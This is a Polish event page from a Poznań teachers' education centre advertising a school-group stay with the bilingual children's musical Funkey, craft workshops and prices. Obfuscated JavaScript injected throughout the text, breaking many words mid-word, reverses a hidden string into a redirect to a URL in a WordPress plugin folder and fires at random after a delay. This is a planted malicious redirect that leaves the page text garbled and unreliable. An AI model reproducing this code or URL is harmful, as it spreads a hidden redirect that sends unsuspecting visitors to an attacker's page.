Site Loader

Ośrodek Edukacyjny dla Nauczycieli (www.oedn.pl) we współpracy z  Marta Lisiewicz Art  oraz Centrum Turystyki i Edukacji „KAWKA” zapraszają na edukacyjny pobyt w STAREJ SZKOLE  pod hasłem : Nasza przyszłość – bawimy się , uczymy się , współpracujemy aby w przyszłości podołać wyzwaniom !

W programie pobytu grupy w STAREJ SZKOLE ( Konarskie koło Kórnika ) proponujemy :

 . PROJEKT FUNKEY- toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to profesjonalne występy musicalowe dla dzieci  przedszkolnych  jak i nietypowe szkolenie dla nauczycieli przeciwdziałające wypaleniu zawodowemu, otwierające ich na KREATYWNOŚĆ w nauczaniu i rozwiązywaniu problemów wychowawczych .  

Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torski, dwujęzyczny Musical Funkey jest doskonałą okazją dla dzieci do  spotkania  się ze sztuką, muzyką ,  językiem angielskim oraz uniwersalnymi wartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tościami  . 

Musical, dzięki interesującej  fabule, ciekawej scenografii i choreografii  twórczo inspirujei  jest przeznaczony  dla dzieci przedszkolnych

Funkey składa się z 3 odcinków fabularnych oraz 2 „interviews with animals”, które utrwalają znajomość języka angielskiego.  Jest jednak możliwość zakończenia współpracy po pierwszym czy też następnym odcinku . 

Przed pierwszym i po każdym następnym  występie wysyłamy nauczycielom mailowo materiały /karty pracy dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane do każdego poziomu językowego z propozycjami nowoczesnych metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tod nauczania ( np. odwrócone, lekcja rotacyjna, nauczanie  kreatywne) podsumowujące występ lub też przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towujące dzieci do aktywnego uczestnictwa werbalnego podczas następnego  występu.

Zakres środków językowych jak i konstrukcji gramatycznych jest zgodny z podstawą programową. 

FUNKEY występuje dla grupy 45 – 50 osobowej ( 2 lub 3 klasy łączone )

Kontynuacja projektu  po spotkaniu w STAREJ SZKOLE  odbywa się  minimalnie 2-3 razy w Państwa  placówce za każdorazowym przyjazdem po uzgodnieniu  terminu .Koszt od dziecka toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to 10 zł  za każde spotkanie z materiałami dydaktycznymi w wersji elektronicznej  .

Występ przed mniejszą  publicznością ,wymaga negocjacji cenowej , wpływa jednak na lepszą jakość percepcji sztuki – muzyki, scenografii, gry aktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torskiej, tańca,  przybliżając dzieciom ten świat bardziej kameralnie.

2. W  programie zajęć w Centrum Turystyki  i Edukacji „Kawka” :

– malowanie  kórnickich kogutków   ( w okresie świąt Wielkanocnych  – akcenty świąteczne i kórnickie zające ),

– lekcja w dawnej szkole- pisanie, rysunki , szlaczki  lipowym patykiem, projekcja bajek ,

– pokaz  żywego inwentarza  – króliki, świnki, kury, kaczki,

– prezentacja dawnych narzędzi  gospodarskich i domowych,

– zabawy na świeżym powietrzu,

– ognisko  – prowiant we własnym zakresie  ( przy sprzyjającej pogodzie ).

3. Propozycja kompleksowego rozwiązywania problemów wych. w grupie przedszkolnej

Opracowanie psychologiczno-pedagogiczna przedsięwzięcia w STAREJ SZKOLE jest przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towane przez ekspertów Ośrodka  Edukacyjnego  dla Nauczycieli  w Poznaniu

Rozpoczęcie zajęć w STAREJ SZKOLE – godz.  8:00   lub  9:00 / 11:00 lub 12:00

Czas pobytu : 3 godziny .  Koszt dla grupy 45-50 os.  – 35 zł ,-zł/os.  Dojazd we własnym zakresie.

Nauczycielom biorącym udział w tych swoistych warsztatach dla uczniów i nauczycieli, Ośrodek Edukacyjny dla Nauczycieli wystawi imienne zaświadczenia  udziału w szkoleniu  zgodnie z rozporządzeniem MEN z dnia  z dnia  28  maja 2019 r. w sprawie placówek doskonalenia nauczycieli ( Dz. U. z  dnia 6.06.2019 r. , poz. 1045 )  / w zakresie stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowania innowacyjnych metoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tod dydaktyczno-wychowawczych  .

W przypadku zamówień z placówek  poza Poznaniem prosimy o uwzględnienie naszej sugestii FUNKEY występuje dla grupy 45-50 dzieci ( 2 lub 3 klasy łączone ) minimalnie 3 razy w danej placówce za każdorazowym przyjazdem. ( 3 grupy ) Każdy kolejny odcinek FUNKEY toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to koszt  – 10 zł /od dziecka . Czas trwania spektaklu – 45 minut .

Informacje : tel.  618720905 lub 502624093  . Zgłoszenie  przesyłamy drogą elektroniczną  na nasz adres  $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:oednpoznan@gmail.com” target=”_blank” rel=”noreferrer noopener”>oednpoznan@gmail.com